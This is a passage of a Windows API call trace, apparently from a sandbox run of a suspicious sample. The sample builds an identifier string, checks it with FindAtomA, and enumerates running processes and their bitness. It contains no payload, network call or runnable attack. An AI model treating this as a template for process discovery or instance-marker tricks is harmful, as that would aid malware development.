	[0071.430] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.430] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0071.430] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.431] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.432] GetLastError () returned 0x5
	[0071.433] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.433] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0071.433] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.433] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0071.433] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0071.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0071.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0071.433] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.433] CloseHandle (hObject=0x224) returned 1
	[0071.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0071.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0071.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0071.433] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.434] CloseHandle (hObject=0x224) returned 1
	[0071.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0071.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16b38) returned 0xc0000004
	[0071.598] VirtualAlloc (lpAddress=0x0, dwSize=0x16c38, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0071.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16c38, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0071.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0071.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0071.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0071.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0071.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0071.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0071.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0071.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0071.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0071.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0071.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0071.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0071.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0071.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0071.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0071.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0071.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0071.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0071.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0071.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0071.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0071.612] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.612] CloseHandle (hObject=0x224) returned 1
	[0071.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0071.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0071.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7288f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0071.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0071.613] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.613] CloseHandle (hObject=0x224) returned 1
	[0071.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7289b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0071.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0071.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0071.613] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.613] CloseHandle (hObject=0x224) returned 1
	[0071.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0071.614] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.614] CloseHandle (hObject=0x224) returned 1
	[0071.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0071.614] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.614] CloseHandle (hObject=0x224) returned 1
	[0071.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0071.614] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.614] CloseHandle (hObject=0x224) returned 1
	[0071.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0071.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0071.614] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.614] CloseHandle (hObject=0x224) returned 1
	[0071.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0071.614] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.614] CloseHandle (hObject=0x224) returned 1
	[0071.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0071.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0071.615] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.615] CloseHandle (hObject=0x224) returned 1
	[0071.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0071.615] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.615] CloseHandle (hObject=0x224) returned 1
	[0071.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0071.615] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.615] CloseHandle (hObject=0x224) returned 1
	[0071.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7289f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0071.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0071.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0071.616] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.616] CloseHandle (hObject=0x224) returned 1
	[0071.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0071.616] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.616] CloseHandle (hObject=0x224) returned 1
	[0071.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0071.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0071.616] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.616] CloseHandle (hObject=0x224) returned 1
	[0071.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0071.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0071.616] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.616] CloseHandle (hObject=0x224) returned 1
	[0071.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e8d8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0071.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0071.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.617] CloseHandle (hObject=0x224) returned 1
	[0071.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0071.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.617] CloseHandle (hObject=0x224) returned 1
	[0071.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0071.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.617] CloseHandle (hObject=0x224) returned 1
	[0071.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0071.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.617] CloseHandle (hObject=0x224) returned 1
	[0071.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0071.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
